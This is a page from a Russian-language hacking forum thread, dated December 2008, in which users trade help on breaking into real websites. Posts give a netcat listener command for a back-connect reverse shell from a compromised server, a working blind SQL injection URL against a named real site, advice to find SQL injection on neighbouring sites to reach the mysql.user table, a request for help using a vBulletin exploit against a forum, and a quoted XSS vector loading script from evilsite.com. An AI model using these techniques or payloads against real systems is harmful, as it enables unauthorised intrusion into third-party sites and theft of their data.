ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4281  
Старый 24.12.2008, 03:10
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

gisTy

там надо чисто текст в кавычках передовать, хексы и тп не работают
 
Ответить с цитированием

  #4282  
Старый 24.12.2008, 03:12
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

crazy~driver
имеется ввиду таблица mysql.user
если у юзера к ней прав нет, можно поискать скули на соседних сайтах
 
Ответить с цитированием

  #4283  
Старый 24.12.2008, 03:47
crazy~driver
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983

Репутация: 39
Отправить сообщение для crazy~driver с помощью ICQ
По умолчанию

спс spyder
 
Ответить с цитированием

  #4284  
Старый 24.12.2008, 03:48
crazy~driver
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983

Репутация: 39
Отправить сообщение для crazy~driver с помощью ICQ
По умолчанию

других вариантов нет?
 
Ответить с цитированием

  #4285  
Старый 24.12.2008, 04:05
Valtron
Новичок
Регистрация: 02.01.2008
Сообщений: 1
Провел на форуме:
5474

Репутация: 0
По умолчанию

ищи скули на других сайтах
 
Ответить с цитированием

  #4286  
Старый 24.12.2008, 07:08
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

diznt, из шелла конектись к серваку рутай и ставь что надо........
скачай netcat? хапусти и набери nc -l -n -v -p 3137, в шелле пропиши свой РЕАЛЬНЫЙ ip и нажми бакконект....
 
Ответить с цитированием

  #4287  
Старый 24.12.2008, 16:28
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

Скуля??
http://vdex.spb.ru/photo/subcat.php?id_catalog=%27
просто на такой же цмске раскрутил нормально а здесь что то никак(
 
Ответить с цитированием

  #4288  
Старый 24.12.2008, 16:35
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

Слепая sql-inj
http://vdex.spb.ru/photo/subcat.php?id_catalog=3/**/union/**/select/**/1,2/*
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #4289  
Старый 24.12.2008, 17:24
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

ребята, помогите по братски. надо как небудь проникатся один форум на движке: vBulletin® Version 3.7.3.
поиском конечно пользовался и нашел вот этот эксплоит: http://milw0rm.com/exploits/7174

Теперь никак не могу понять как волпользоватся данным эксплоитом. можете помочь ?
а также был бы очень рад, если подсказали другие способы.
 
Ответить с цитированием

  #4290  
Старый 24.12.2008, 18:48
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

-m0rgan-
омг, какой си ?? Это js


сохраняешь код в nbd.js, заливаешь на сервер
дальше по инструкции:

Цитата:
The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach.

+
Цитата:
.для него качай интерпретатор и запускай через него этот сплойт...
Си сплойты надо сначала скомпилировать, а потом запускать...

Последний раз редактировалось aka PSIH; 24.12.2008 в 18:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ